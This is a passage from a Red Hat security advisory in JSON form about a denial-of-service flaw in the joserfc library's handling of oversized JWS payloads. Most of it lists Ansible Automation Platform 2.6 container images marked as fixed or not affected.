"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2490168"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in joserfc, a Python library for JSON Object Signing and Encryption (JOSE). This vulnerability allows a remote attacker to cause resource exhaustion, leading to a Denial of Service (DoS), by sending oversized JSON Web Signature (JWS) payloads. The library fails to apply size limits, specifically JWSRegistry.max_payload_length, when processing RFC7797 b64=false JWS payloads.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
